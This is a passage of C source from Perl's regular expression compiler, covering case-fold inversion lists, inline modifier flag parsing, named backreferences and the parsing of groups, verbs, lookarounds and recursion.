for (i = 0; i < UTF8_MAX_FOLD_CHAR_EXPAND && s < e; i++) {
if (isASCII(*s)) {
*(d++) = (U8) toFOLD(*s);
if (fc < 0) { /* Save the first fold */
fc = *(d-1);
}
s++;
}
else {
STRLEN len;
UV fold = toFOLD_utf8_safe(s, e, d, &len);
if (fc < 0) { /* Save the first fold */
fc = fold;
}
d += len;
s += UTF8SKIP(s);
}
}
/* And set up so the code below that looks in this folded
* buffer instead of the node's string */
e = d;
s = folded;
}
/* When we reach here 's' points to the fold of the first
* character(s) of the node; and 'e' points to far enough along
* the folded string to be just past any possible multi-char
* fold.
*
* Unlike the non-UTF-8 case, the macro for determining if a
* string is a multi-char fold requires all the characters to
* already be folded. This is because of all the complications
* if not. Note that they are folded anyway, except in EXACTFL
* nodes. Like the non-UTF case above, we punt if the node
* begins with a multi-char fold */
if (is_MULTI_CHAR_FOLD_utf8_safe(s, e)) {
invlist = _add_range_to_invlist(invlist, 0, UV_MAX);
}
else { /* Single char fold */
unsigned int k;
unsigned int first_fold;
const unsigned int * remaining_folds;
Size_t folds_count;
/* It matches itself */
invlist = add_cp_to_invlist(invlist, fc);
/* ... plus all the things that fold to it, which are found in
* PL_utf8_foldclosures */
folds_count = _inverse_folds(fc, &first_fold,
&remaining_folds);
for (k = 0; k < folds_count; k++) {
UV c = (k == 0) ? first_fold : remaining_folds[k-1];
/* /aa doesn't allow folds between ASCII and non- */
if ( (OP(node) == EXACTFAA || OP(node) == EXACTFAA_NO_TRIE)
&& isASCII(c) != isASCII(fc))
{
continue;
}
invlist = add_cp_to_invlist(invlist, c);
}
if (OP(node) == EXACTFL) {
/* If either [iI] are present in an EXACTFL node the above code
* should have added its normal case pair, but under a Turkish
* locale they could match instead the case pairs from it. Add
* those as potential matches as well */
if (isALPHA_FOLD_EQ(fc, 'I')) {
invlist = add_cp_to_invlist(invlist,
LATIN_SMALL_LETTER_DOTLESS_I);
invlist = add_cp_to_invlist(invlist,
LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE);
}
else if (fc == LATIN_SMALL_LETTER_DOTLESS_I) {
invlist = add_cp_to_invlist(invlist, 'I');
}
else if (fc == LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE) {
invlist = add_cp_to_invlist(invlist, 'i');
}
}
}
}
return invlist;
}
#undef HEADER_LENGTH
#undef TO_INTERNAL_SIZE
#undef FROM_INTERNAL_SIZE
#undef INVLIST_VERSION_ID
/* End of inversion list object */
STATIC void
S_parse_lparen_question_flags(pTHX_ RExC_state_t *pRExC_state)
{
/* This parses the flags that are in either the '(?foo)' or '(?foo:bar)'
* constructs, and updates RExC_flags with them. On input, RExC_parse
* should point to the first flag; it is updated on output to point to the
* final ')' or ':'. There needs to be at least one flag, or this will
* abort */
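    /* For example, '(?i-xs:...)' turns on /i and turns off /x and /s for just
     * the enclosed group, while '(?^i)' resets to the default flags and then
     * turns on /i for the remainder of the enclosing group. */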
/* for (?g), (?gc), and (?o) warnings; warning
about (?c) will warn about (?g) -- japhy */
#define WASTED_O 0x01
#define WASTED_G 0x02
#define WASTED_C 0x04
#define WASTED_GC (WASTED_G|WASTED_C)
I32 wastedflags = 0x00;
U32 posflags = 0, negflags = 0;
U32 *flagsp = &posflags;
char has_charset_modifier = '\0';
regex_charset cs;
bool has_use_defaults = FALSE;
const char* const seqstart = RExC_parse - 1; /* Point to the '?' */
int x_mod_count = 0;
PERL_ARGS_ASSERT_PARSE_LPAREN_QUESTION_FLAGS;
/* '^' as an initial flag sets certain defaults */
if (UCHARAT(RExC_parse) == '^') {
RExC_parse++;
has_use_defaults = TRUE;
STD_PMMOD_FLAGS_CLEAR(&RExC_flags);
cs = (RExC_uni_semantics)
? REGEX_UNICODE_CHARSET
: REGEX_DEPENDS_CHARSET;
set_regex_charset(&RExC_flags, cs);
}
else {
cs = get_regex_charset(RExC_flags);
if ( cs == REGEX_DEPENDS_CHARSET
&& RExC_uni_semantics)
{
cs = REGEX_UNICODE_CHARSET;
}
}
while (RExC_parse < RExC_end) {
/* && strchr("iogcmsx", *RExC_parse) */
/* (?g), (?gc) and (?o) are useless here
and must be globally applied -- japhy */
switch (*RExC_parse) {
/* Code for the imsxn flags */
CASE_STD_PMMOD_FLAGS_PARSE_SET(flagsp, x_mod_count);
case LOCALE_PAT_MOD:
if (has_charset_modifier) {
goto excess_modifier;
}
else if (flagsp == &negflags) {
goto neg_modifier;
}
cs = REGEX_LOCALE_CHARSET;
has_charset_modifier = LOCALE_PAT_MOD;
break;
case UNICODE_PAT_MOD:
if (has_charset_modifier) {
goto excess_modifier;
}
else if (flagsp == &negflags) {
goto neg_modifier;
}
cs = REGEX_UNICODE_CHARSET;
has_charset_modifier = UNICODE_PAT_MOD;
break;
case ASCII_RESTRICT_PAT_MOD:
if (flagsp == &negflags) {
goto neg_modifier;
}
if (has_charset_modifier) {
if (cs != REGEX_ASCII_RESTRICTED_CHARSET) {
goto excess_modifier;
}
/* Doubled modifier implies more restricted */
cs = REGEX_ASCII_MORE_RESTRICTED_CHARSET;
}
else {
cs = REGEX_ASCII_RESTRICTED_CHARSET;
}
has_charset_modifier = ASCII_RESTRICT_PAT_MOD;
break;
case DEPENDS_PAT_MOD:
if (has_use_defaults) {
goto fail_modifiers;
}
else if (flagsp == &negflags) {
goto neg_modifier;
}
else if (has_charset_modifier) {
goto excess_modifier;
}
/* The dual charset means unicode semantics if the
* pattern (or target, not known until runtime) are
* utf8, or something in the pattern indicates unicode
* semantics */
cs = (RExC_uni_semantics)
? REGEX_UNICODE_CHARSET
: REGEX_DEPENDS_CHARSET;
has_charset_modifier = DEPENDS_PAT_MOD;
break;
excess_modifier:
RExC_parse++;
if (has_charset_modifier == ASCII_RESTRICT_PAT_MOD) {
vFAIL2("Regexp modifier \"%c\" may appear a maximum of twice", ASCII_RESTRICT_PAT_MOD);
}
else if (has_charset_modifier == *(RExC_parse - 1)) {
vFAIL2("Regexp modifier \"%c\" may not appear twice",
*(RExC_parse - 1));
}
else {
vFAIL3("Regexp modifiers \"%c\" and \"%c\" are mutually exclusive", has_charset_modifier, *(RExC_parse - 1));
}
NOT_REACHED; /*NOTREACHED*/
neg_modifier:
RExC_parse++;
vFAIL2("Regexp modifier \"%c\" may not appear after the \"-\"",
*(RExC_parse - 1));
NOT_REACHED; /*NOTREACHED*/
case ONCE_PAT_MOD: /* 'o' */
case GLOBAL_PAT_MOD: /* 'g' */
if (ckWARN(WARN_REGEXP)) {
const I32 wflagbit = *RExC_parse == 'o'
? WASTED_O
: WASTED_G;
if (! (wastedflags & wflagbit) ) {
wastedflags |= wflagbit;
/* diag_listed_as: Useless (?-%s) - don't use /%s modifier in regex; marked by <-- HERE in m/%s/ */
vWARN5(
RExC_parse + 1,
"Useless (%s%c) - %suse /%c modifier",
flagsp == &negflags ? "?-" : "?",
*RExC_parse,
flagsp == &negflags ? "don't " : "",
*RExC_parse
);
}
}
break;
case CONTINUE_PAT_MOD: /* 'c' */
if (ckWARN(WARN_REGEXP)) {
if (! (wastedflags & WASTED_C) ) {
wastedflags |= WASTED_GC;
/* diag_listed_as: Useless (?-%s) - don't use /%s modifier in regex; marked by <-- HERE in m/%s/ */
vWARN3(
RExC_parse + 1,
"Useless (%sc) - %suse /gc modifier",
flagsp == &negflags ? "?-" : "?",
flagsp == &negflags ? "don't " : ""
);
}
}
break;
case KEEPCOPY_PAT_MOD: /* 'p' */
if (flagsp == &negflags) {
ckWARNreg(RExC_parse + 1,"Useless use of (?-p)");
} else {
*flagsp |= RXf_PMf_KEEPCOPY;
}
break;
case '-':
/* A flag is a default iff it is following a minus, so
             * if there is a minus, it means we will be trying to
             * re-specify a default, which is an error */
if (has_use_defaults || flagsp == &negflags) {
goto fail_modifiers;
}
flagsp = &negflags;
wastedflags = 0; /* reset so (?g-c) warns twice */
x_mod_count = 0;
break;
case ':':
case ')':
if ((posflags & (RXf_PMf_EXTENDED|RXf_PMf_EXTENDED_MORE)) == RXf_PMf_EXTENDED) {
negflags |= RXf_PMf_EXTENDED_MORE;
}
RExC_flags |= posflags;
if (negflags & RXf_PMf_EXTENDED) {
negflags |= RXf_PMf_EXTENDED_MORE;
}
RExC_flags &= ~negflags;
set_regex_charset(&RExC_flags, cs);
return;
default:
fail_modifiers:
RExC_parse += SKIP_IF_CHAR(RExC_parse, RExC_end);
/* diag_listed_as: Sequence (?%s...) not recognized in regex; marked by <-- HERE in m/%s/ */
vFAIL2utf8f("Sequence (%" UTF8f "...) not recognized",
UTF8fARG(UTF, RExC_parse-seqstart, seqstart));
NOT_REACHED; /*NOTREACHED*/
}
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
}
vFAIL("Sequence (?... not terminated");
}
/*
- reg - regular expression, i.e. main body or parenthesized thing
*
* Caller must absorb opening parenthesis.
*
* Combining parenthesis handling with the base level of regular expression
* is a trifle forced, but the need to tie the tails of the branches to what
* follows makes it hard to avoid.
*/
#define REGTAIL(x,y,z) regtail((x),(y),(z),depth+1)
#ifdef DEBUGGING
#define REGTAIL_STUDY(x,y,z) regtail_study((x),(y),(z),depth+1)
#else
#define REGTAIL_STUDY(x,y,z) regtail((x),(y),(z),depth+1)
#endif
PERL_STATIC_INLINE regnode_offset
S_handle_named_backref(pTHX_ RExC_state_t *pRExC_state,
I32 *flagp,
char * parse_start,
char ch
)
{
regnode_offset ret;
char* name_start = RExC_parse;
U32 num = 0;
SV *sv_dat = reg_scan_name(pRExC_state, REG_RSN_RETURN_DATA);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_HANDLE_NAMED_BACKREF;
if (RExC_parse == name_start || *RExC_parse != ch) {
/* diag_listed_as: Sequence \%s... not terminated in regex; marked by <-- HERE in m/%s/ */
vFAIL2("Sequence %.3s... not terminated", parse_start);
}
if (sv_dat) {
num = add_data( pRExC_state, STR_WITH_LEN("S"));
RExC_rxi->data->data[num]=(void*)sv_dat;
SvREFCNT_inc_simple_void_NN(sv_dat);
}
RExC_sawback = 1;
ret = reganode(pRExC_state,
((! FOLD)
? NREF
: (ASCII_FOLD_RESTRICTED)
? NREFFA
: (AT_LEAST_UNI_SEMANTICS)
? NREFFU
: (LOC)
? NREFFL
: NREFF),
num);
*flagp |= HASWIDTH;
Set_Node_Offset(REGNODE_p(ret), parse_start+1);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start);
nextchar(pRExC_state);
return ret;
}
/* On success, returns the offset at which any next node should be placed into
* the regex engine program being compiled.
*
* Returns 0 otherwise, with *flagp set to indicate why:
* TRYAGAIN at the end of (?) that only sets flags.
* RESTART_PARSE if the parse needs to be restarted, or'd with
* NEED_UTF8 if the pattern needs to be upgraded to UTF-8.
* Otherwise would only return 0 if regbranch() returns 0, which cannot
* happen. */
STATIC regnode_offset
S_reg(pTHX_ RExC_state_t *pRExC_state, I32 paren, I32 *flagp, U32 depth)
/* paren: Parenthesized? 0=top; 1,2=inside '(': changed to letter.
* 2 is like 1, but indicates that nextchar() has been called to advance
* RExC_parse beyond the '('. Things like '(?' are indivisible tokens, and
* this flag alerts us to the need to check for that */
{
regnode_offset ret = 0; /* Will be the head of the group. */
regnode_offset br;
regnode_offset lastbr;
regnode_offset ender = 0;
I32 parno = 0;
I32 flags;
U32 oregflags = RExC_flags;
bool have_branch = 0;
bool is_open = 0;
I32 freeze_paren = 0;
I32 after_freeze = 0;
I32 num; /* numeric backreferences */
SV * max_open; /* Max number of unclosed parens */
char * parse_start = RExC_parse; /* MJD */
char * const oregcomp_parse = RExC_parse;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REG;
DEBUG_PARSE("reg ");
max_open = get_sv(RE_COMPILE_RECURSION_LIMIT, GV_ADD);
assert(max_open);
if (!SvIOK(max_open)) {
sv_setiv(max_open, RE_COMPILE_RECURSION_INIT);
}
if (depth > 4 * (UV) SvIV(max_open)) { /* We increase depth by 4 for each
open paren */
vFAIL("Too many nested open parens");
}
*flagp = 0; /* Tentatively. */
/* Having this true makes it feasible to have a lot fewer tests for the
* parse pointer being in scope. For example, we can write
* while(isFOO(*RExC_parse)) RExC_parse++;
* instead of
* while(RExC_parse < RExC_end && isFOO(*RExC_parse)) RExC_parse++;
*/
assert(*RExC_end == '\0');
/* Make an OPEN node, if parenthesized. */
if (paren) {
/* Under /x, space and comments can be gobbled up between the '(' and
* here (if paren ==2). The forms '(*VERB' and '(?...' disallow such
* intervening space, as the sequence is a token, and a token should be
* indivisible */
bool has_intervening_patws = (paren == 2)
&& *(RExC_parse - 1) != '(';
if (RExC_parse >= RExC_end) {
vFAIL("Unmatched (");
}
if (paren == 'r') { /* Atomic script run */
paren = '>';
goto parse_rest;
}
else if ( *RExC_parse == '*') { /* (*VERB:ARG), (*construct:...) */
char *start_verb = RExC_parse + 1;
STRLEN verb_len;
char *start_arg = NULL;
unsigned char op = 0;
int arg_required = 0;
int internal_argval = -1; /* if >-1 we are not allowed an argument*/
bool has_upper = FALSE;
if (has_intervening_patws) {
RExC_parse++; /* past the '*' */
/* For strict backwards compatibility, don't change the message
* now that we also have lowercase operands */
if (isUPPER(*RExC_parse)) {
vFAIL("In '(*VERB...)', the '(' and '*' must be adjacent");
}
else {
vFAIL("In '(*...)', the '(' and '*' must be adjacent");
}
}
while (RExC_parse < RExC_end && *RExC_parse != ')' ) {
if ( *RExC_parse == ':' ) {
start_arg = RExC_parse + 1;
break;
}
else if (! UTF) {
if (isUPPER(*RExC_parse)) {
has_upper = TRUE;
}
RExC_parse++;
}
else {
RExC_parse += UTF8SKIP(RExC_parse);
}
}
verb_len = RExC_parse - start_verb;
if ( start_arg ) {
if (RExC_parse >= RExC_end) {
goto unterminated_verb_pattern;
}
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
while ( RExC_parse < RExC_end && *RExC_parse != ')' ) {
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
}
if ( RExC_parse >= RExC_end || *RExC_parse != ')' ) {
unterminated_verb_pattern:
if (has_upper) {
vFAIL("Unterminated verb pattern argument");
}
else {
vFAIL("Unterminated '(*...' argument");
}
}
} else {
if ( RExC_parse >= RExC_end || *RExC_parse != ')' ) {
if (has_upper) {
vFAIL("Unterminated verb pattern");
}
else {
vFAIL("Unterminated '(*...' construct");
}
}
}
/* Here, we know that RExC_parse < RExC_end */
switch ( *start_verb ) {
case 'A': /* (*ACCEPT) */
if ( memEQs(start_verb, verb_len,"ACCEPT") ) {
op = ACCEPT;
internal_argval = RExC_nestroot;
}
break;
case 'C': /* (*COMMIT) */
if ( memEQs(start_verb, verb_len,"COMMIT") )
op = COMMIT;
break;
case 'F': /* (*FAIL) */
if ( verb_len==1 || memEQs(start_verb, verb_len,"FAIL") ) {
op = OPFAIL;
}
break;
case ':': /* (*:NAME) */
case 'M': /* (*MARK:NAME) */
if ( verb_len==0 || memEQs(start_verb, verb_len,"MARK") ) {
op = MARKPOINT;
arg_required = 1;
}
break;
case 'P': /* (*PRUNE) */
if ( memEQs(start_verb, verb_len,"PRUNE") )
op = PRUNE;
break;
case 'S': /* (*SKIP) */
if ( memEQs(start_verb, verb_len,"SKIP") )
op = SKIP;
break;
case 'T': /* (*THEN) */
/* [19:06] <TimToady> :: is then */
if ( memEQs(start_verb, verb_len,"THEN") ) {
op = CUTGROUP;
RExC_seen |= REG_CUTGROUP_SEEN;
}
break;
case 'a':
if ( memEQs(start_verb, verb_len, "asr")
|| memEQs(start_verb, verb_len, "atomic_script_run"))
{
paren = 'r'; /* Mnemonic: recursed run */
goto script_run;
}
else if (memEQs(start_verb, verb_len, "atomic")) {
paren = 't'; /* AtOMIC */
goto alpha_assertions;
}
break;
case 'p':
if ( memEQs(start_verb, verb_len, "plb")
|| memEQs(start_verb, verb_len, "positive_lookbehind"))
{
paren = 'b';
goto lookbehind_alpha_assertions;
}
else if ( memEQs(start_verb, verb_len, "pla")
|| memEQs(start_verb, verb_len, "positive_lookahead"))
{
paren = 'a';
goto alpha_assertions;
}
break;
case 'n':
if ( memEQs(start_verb, verb_len, "nlb")
|| memEQs(start_verb, verb_len, "negative_lookbehind"))
{
paren = 'B';
goto lookbehind_alpha_assertions;
}
else if ( memEQs(start_verb, verb_len, "nla")
|| memEQs(start_verb, verb_len, "negative_lookahead"))
{
paren = 'A';
goto alpha_assertions;
}
break;
case 's':
if ( memEQs(start_verb, verb_len, "sr")
|| memEQs(start_verb, verb_len, "script_run"))
{
regnode_offset atomic;
paren = 's';
script_run:
/* This indicates Unicode rules. */
REQUIRE_UNI_RULES(flagp, 0);
if (! start_arg) {
goto no_colon;
}
RExC_parse = start_arg;
if (RExC_in_script_run) {
/* Nested script runs are treated as no-ops, because
* if the nested one fails, the outer one must as
* well. It could fail sooner, and avoid (??{} with
* side effects, but that is explicitly documented as
* undefined behavior. */
ret = 0;
if (paren == 's') {
paren = ':';
goto parse_rest;
}
/* But, the atomic part of a nested atomic script run
* isn't a no-op, but can be treated just like a '(?>'
* */
paren = '>';
goto parse_rest;
}
/* By doing this here, we avoid extra warnings for nested
* script runs */
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__SCRIPT_RUN,
"The script_run feature is experimental");
if (paren == 's') {
/* Here, we're starting a new regular script run */
ret = reg_node(pRExC_state, SROPEN);
RExC_in_script_run = 1;
is_open = 1;
goto parse_rest;
}
/* Here, we are starting an atomic script run. This is
* handled by recursing to deal with the atomic portion
* separately, enclosed in SROPEN ... SRCLOSE nodes */
ret = reg_node(pRExC_state, SROPEN);
RExC_in_script_run = 1;
atomic = reg(pRExC_state, 'r', &flags, depth);
if (flags & (RESTART_PARSE|NEED_UTF8)) {
*flagp = flags & (RESTART_PARSE|NEED_UTF8);
return 0;
}
if (! REGTAIL(pRExC_state, ret, atomic)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (! REGTAIL(pRExC_state, atomic, reg_node(pRExC_state,
SRCLOSE)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
RExC_in_script_run = 0;
return ret;
}
break;
lookbehind_alpha_assertions:
RExC_seen |= REG_LOOKBEHIND_SEEN;
RExC_in_lookbehind++;
/*FALLTHROUGH*/
alpha_assertions:
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__ALPHA_ASSERTIONS,
"The alpha_assertions feature is experimental");
RExC_seen_zerolen++;
if (! start_arg) {
goto no_colon;
}
/* An empty negative lookahead assertion simply is failure */
if (paren == 'A' && RExC_parse == start_arg) {
ret=reganode(pRExC_state, OPFAIL, 0);
nextchar(pRExC_state);
return ret;
}
RExC_parse = start_arg;
goto parse_rest;
no_colon:
vFAIL2utf8f(
"'(*%" UTF8f "' requires a terminating ':'",
UTF8fARG(UTF, verb_len, start_verb));
NOT_REACHED; /*NOTREACHED*/
} /* End of switch */
if ( ! op ) {
RExC_parse += UTF
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
if (has_upper || verb_len == 0) {
vFAIL2utf8f(
"Unknown verb pattern '%" UTF8f "'",
UTF8fARG(UTF, verb_len, start_verb));
}
else {
vFAIL2utf8f(
"Unknown '(*...)' construct '%" UTF8f "'",
UTF8fARG(UTF, verb_len, start_verb));
}
}
if ( RExC_parse == start_arg ) {
start_arg = NULL;
}
if ( arg_required && !start_arg ) {
vFAIL3("Verb pattern '%.*s' has a mandatory argument",
verb_len, start_verb);
}
if (internal_argval == -1) {
ret = reganode(pRExC_state, op, 0);
} else {
ret = reg2Lanode(pRExC_state, op, 0, internal_argval);
}
RExC_seen |= REG_VERBARG_SEEN;
if (start_arg) {
SV *sv = newSVpvn( start_arg,
RExC_parse - start_arg);
ARG(REGNODE_p(ret)) = add_data( pRExC_state,
STR_WITH_LEN("S"));
RExC_rxi->data->data[ARG(REGNODE_p(ret))]=(void*)sv;
FLAGS(REGNODE_p(ret)) = 1;
} else {
FLAGS(REGNODE_p(ret)) = 0;
}
if ( internal_argval != -1 )
ARG2L_SET(REGNODE_p(ret), internal_argval);
nextchar(pRExC_state);
return ret;
}
else if (*RExC_parse == '?') { /* (?...) */
bool is_logical = 0;
const char * const seqstart = RExC_parse;
const char * endptr;
if (has_intervening_patws) {
RExC_parse++;
vFAIL("In '(?...)', the '(' and '?' must be adjacent");
}
RExC_parse++; /* past the '?' */
paren = *RExC_parse; /* might be a trailing NUL, if not
well-formed */
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
if (RExC_parse > RExC_end) {
paren = '\0';
}
ret = 0; /* For look-ahead/behind. */
switch (paren) {
case 'P': /* (?P...) variants for those used to PCRE/Python */
paren = *RExC_parse;
if ( paren == '<') { /* (?P<...>) named capture */
RExC_parse++;
if (RExC_parse >= RExC_end) {
vFAIL("Sequence (?P<... not terminated");
}
goto named_capture;
}
else if (paren == '>') { /* (?P>name) named recursion */
RExC_parse++;
if (RExC_parse >= RExC_end) {
vFAIL("Sequence (?P>... not terminated");
}
goto named_recursion;
}
else if (paren == '=') { /* (?P=...) named backref */
RExC_parse++;
return handle_named_backref(pRExC_state, flagp,
parse_start, ')');
}
RExC_parse += SKIP_IF_CHAR(RExC_parse, RExC_end);
/* diag_listed_as: Sequence (?%s...) not recognized in regex; marked by <-- HERE in m/%s/ */
vFAIL3("Sequence (%.*s...) not recognized",
RExC_parse-seqstart, seqstart);
NOT_REACHED; /*NOTREACHED*/
case '<': /* (?<...) */
if (*RExC_parse == '!')
paren = ',';
else if (*RExC_parse != '=')
named_capture:
{ /* (?<...>) */
char *name_start;
SV *svname;
paren= '>';
/* FALLTHROUGH */
case '\'': /* (?'...') */
name_start = RExC_parse;
svname = reg_scan_name(pRExC_state, REG_RSN_RETURN_NAME);
if ( RExC_parse == name_start
|| RExC_parse >= RExC_end
|| *RExC_parse != paren)
{
vFAIL2("Sequence (?%c... not terminated",
paren=='>' ? '<' : paren);
}
{
HE *he_str;
SV *sv_dat = NULL;
if (!svname) /* shouldn't happen */
Perl_croak(aTHX_
"panic: reg_scan_name returned NULL");
if (!RExC_paren_names) {
RExC_paren_names= newHV();
sv_2mortal(MUTABLE_SV(RExC_paren_names));
#ifdef DEBUGGING
RExC_paren_name_list= newAV();
sv_2mortal(MUTABLE_SV(RExC_paren_name_list));
#endif
}
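/* The name's SV in RExC_paren_names doubles as a small data structure:
 * its string buffer (SvPVX) holds an array of I32 capture-group numbers
 * that share this name (possible under (?|...)), and its IV holds how
 * many entries are in that array.  The code below either appends the
 * current group number or initializes a fresh one-element array. */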
he_str = hv_fetch_ent( RExC_paren_names, svname, 1, 0 );
if ( he_str )
sv_dat = HeVAL(he_str);
if ( ! sv_dat ) {
/* croak baby croak */
Perl_croak(aTHX_
"panic: paren_name hash element allocation failed");
} else if ( SvPOK(sv_dat) ) {
/* (?|...) can mean we have dupes, so scan to check whether
it's already been stored. Maybe a flag indicating
we are inside such a construct would be useful,
but the arrays are likely to be quite small, so
for now we punt -- dmq */
IV count = SvIV(sv_dat);
I32 *pv = (I32*)SvPVX(sv_dat);
IV i;
for ( i = 0 ; i < count ; i++ ) {
if ( pv[i] == RExC_npar ) {
count = 0;
break;
}
}
if ( count ) {
pv = (I32*)SvGROW(sv_dat,
SvCUR(sv_dat) + sizeof(I32)+1);
SvCUR_set(sv_dat, SvCUR(sv_dat) + sizeof(I32));
pv[count] = RExC_npar;
SvIV_set(sv_dat, SvIVX(sv_dat) + 1);
}
} else {
(void)SvUPGRADE(sv_dat, SVt_PVNV);
sv_setpvn(sv_dat, (char *)&(RExC_npar),
sizeof(I32));
SvIOK_on(sv_dat);
SvIV_set(sv_dat, 1);
}
#ifdef DEBUGGING
/* Yes this does cause a memory leak in debugging Perls
* */
if (!av_store(RExC_paren_name_list,
RExC_npar, SvREFCNT_inc_NN(svname)))
SvREFCNT_dec_NN(svname);
#endif
/*sv_dump(sv_dat);*/
}
nextchar(pRExC_state);
paren = 1;
goto capturing_parens;
}
RExC_seen |= REG_LOOKBEHIND_SEEN;
RExC_in_lookbehind++;
RExC_parse++;
if (RExC_parse >= RExC_end) {
vFAIL("Sequence (?... not terminated");
}
/* FALLTHROUGH */
case '=': /* (?=...) */
RExC_seen_zerolen++;
break;
case '!': /* (?!...) */
RExC_seen_zerolen++;
/* check if we're really just a "FAIL" assertion */
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
if (*RExC_parse == ')') {
ret=reganode(pRExC_state, OPFAIL, 0);
nextchar(pRExC_state);
return ret;
}
break;
case '|': /* (?|...) */
/* branch reset, behave like a (?:...) except that
buffers in alternations share the same numbers */
paren = ':';
after_freeze = freeze_paren = RExC_npar;
/* XXX This construct currently requires an extra pass.
* Investigation would be required to see if that could be
* changed */
REQUIRE_PARENS_PASS;
break;
case ':': /* (?:...) */
case '>': /* (?>...) */
break;
case '$': /* (?$...) */
case '@': /* (?@...) */
vFAIL2("Sequence (?%c...) not implemented", (int)paren);
break;
case '0' : /* (?0) */
case 'R' : /* (?R) */
if (RExC_parse == RExC_end || *RExC_parse != ')')
FAIL("Sequence (?R) not terminated");
num = 0;
RExC_seen |= REG_RECURSE_SEEN;
/* XXX These constructs currently require an extra pass.
* It probably could be changed */
REQUIRE_PARENS_PASS;
*flagp |= POSTPONED;
goto gen_recurse_regop;
/*notreached*/
/* named and numeric backreferences */
case '&': /* (?&NAME) */
parse_start = RExC_parse - 1;
named_recursion:
{
SV *sv_dat = reg_scan_name(pRExC_state,
REG_RSN_RETURN_DATA);
num = sv_dat ? *((I32 *)SvPVX(sv_dat)) : 0;
}
if (RExC_parse >= RExC_end || *RExC_parse != ')')
vFAIL("Sequence (?&... not terminated");
goto gen_recurse_regop;
/* NOTREACHED */
case '+':
if (! inRANGE(RExC_parse[0], '1', '9')) {
RExC_parse++;
vFAIL("Illegal pattern");
}
goto parse_recursion;
/* NOTREACHED*/
case '-': /* (?-1) */
if (! inRANGE(RExC_parse[0], '1', '9')) {
RExC_parse--; /* rewind to let it be handled later */
goto parse_flags;
}
/* FALLTHROUGH */
case '1': case '2': case '3': case '4': /* (?1) */
case '5': case '6': case '7': case '8': case '9':
RExC_parse = (char *) seqstart + 1; /* Point to the digit */
parse_recursion:
{
bool is_neg = FALSE;
UV unum;
parse_start = RExC_parse - 1; /* MJD */
if (*RExC_parse == '-') {
RExC_parse++;
is_neg = TRUE;
}
endptr = RExC_end;
if (grok_atoUV(RExC_parse, &unum, &endptr)
&& unum <= I32_MAX
) {
num = (I32)unum;
RExC_parse = (char*)endptr;
} else
num = I32_MAX;
if (is_neg) {
/* Some limit for num? */
num = -num;
}
}
if (*RExC_parse!=')')
vFAIL("Expecting close bracket");
gen_recurse_regop:
if ( paren == '-' ) {
/*
Diagram of capture buffer numbering.
Top line is the normal capture buffer numbers
Bottom line is the negative indexing as from
the X (the (?-2))
+ 1 2 3 4 5 X 6 7
/(a(x)y)(a(b(c(?-2)d)e)f)(g(h))/
- 5 4 3 2 1 X x x
*/
num = RExC_npar + num;
if (num < 1) {
/* It might be a forward reference; we can't fail until
* we know, by completing the parse to get all the
* groups, and then reparsing */
if (ALL_PARENS_COUNTED) {
RExC_parse++;
vFAIL("Reference to nonexistent group");
}
else {
REQUIRE_PARENS_PASS;
}
}
} else if ( paren == '+' ) {
num = RExC_npar + num - 1;
}
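/* Examples of the adjustment just made (RExC_npar is the number the
 * next capture group would get): in /(a)(b)(?-1)/ the (?-1) resolves
 * to group 2, the most recently opened group to its left, while in
 * /(?+1)(x)/ the (?+1) resolves to group 1, the next group to open. */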
/* We keep track of how many GOSUB items we have produced.
To start off, the ARG2L() of the GOSUB holds its "id",
which is used later in conjunction with RExC_recurse
to calculate the offset we need to jump for the GOSUB,
which it will store in the final representation.
We have to defer the actual calculation until much later
as the regop may move.
*/
ret = reg2Lanode(pRExC_state, GOSUB, num, RExC_recurse_count);
if (num >= RExC_npar) {
/* It might be a forward reference; we can't fail until we
* know, by completing the parse to get all the groups, and
* then reparsing */
if (ALL_PARENS_COUNTED) {
if (num >= RExC_total_parens) {
RExC_parse++;
vFAIL("Reference to nonexistent group");
}
}
else {
REQUIRE_PARENS_PASS;
}
}
RExC_recurse_count++;
DEBUG_OPTIMISE_MORE_r(Perl_re_printf( aTHX_
"%*s%*s Recurse #%" UVuf " to %" IVdf "\n",
22, "| |", (int)(depth * 2 + 1), "",
(UV)ARG(REGNODE_p(ret)),
(IV)ARG2L(REGNODE_p(ret))));
RExC_seen |= REG_RECURSE_SEEN;
Set_Node_Length(REGNODE_p(ret),
1 + regarglen[OP(REGNODE_p(ret))]); /* MJD */
Set_Node_Offset(REGNODE_p(ret), parse_start); /* MJD */
*flagp |= POSTPONED;
assert(*RExC_parse == ')');
nextchar(pRExC_state);
return ret;
/* NOTREACHED */
case '?': /* (??...) */
is_logical = 1;
if (*RExC_parse != '{') {
RExC_parse += SKIP_IF_CHAR(RExC_parse, RExC_end);
/* diag_listed_as: Sequence (?%s...) not recognized in regex; marked by <-- HERE in m/%s/ */
vFAIL2utf8f(
"Sequence (%" UTF8f "...) not recognized",
UTF8fARG(UTF, RExC_parse-seqstart, seqstart));
NOT_REACHED; /*NOTREACHED*/
}
*flagp |= POSTPONED;
paren = '{';
RExC_parse++;
/* FALLTHROUGH */
case '{': /* (?{...}) */
{
U32 n = 0;
struct reg_code_block *cb;
OP * o;
RExC_seen_zerolen++;
if ( !pRExC_state->code_blocks
|| pRExC_state->code_index
>= pRExC_state->code_blocks->count
|| pRExC_state->code_blocks->cb[pRExC_state->code_index].start
!= (STRLEN)((RExC_parse -3 - (is_logical ? 1 : 0))
- RExC_start)
) {
if (RExC_pm_flags & PMf_USE_RE_EVAL)
FAIL("panic: Sequence (?{...}): no code block found\n");
FAIL("Eval-group not allowed at runtime, use re 'eval'");
}
/* this is a pre-compiled code block (?{...}) */
